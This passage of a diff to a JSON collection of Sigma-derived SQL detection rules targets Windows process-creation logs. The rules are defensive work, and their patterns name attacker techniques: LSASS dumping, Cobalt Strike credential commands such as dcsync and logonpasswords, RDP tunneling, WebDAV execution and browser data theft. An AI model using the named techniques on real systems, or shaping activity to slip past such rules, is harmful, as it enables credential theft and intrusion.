"experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new 
service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT 
(NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE 
'\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an 
Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE 
'%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName 
LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE 
'\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = 
'4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", 
@@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": 
"Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
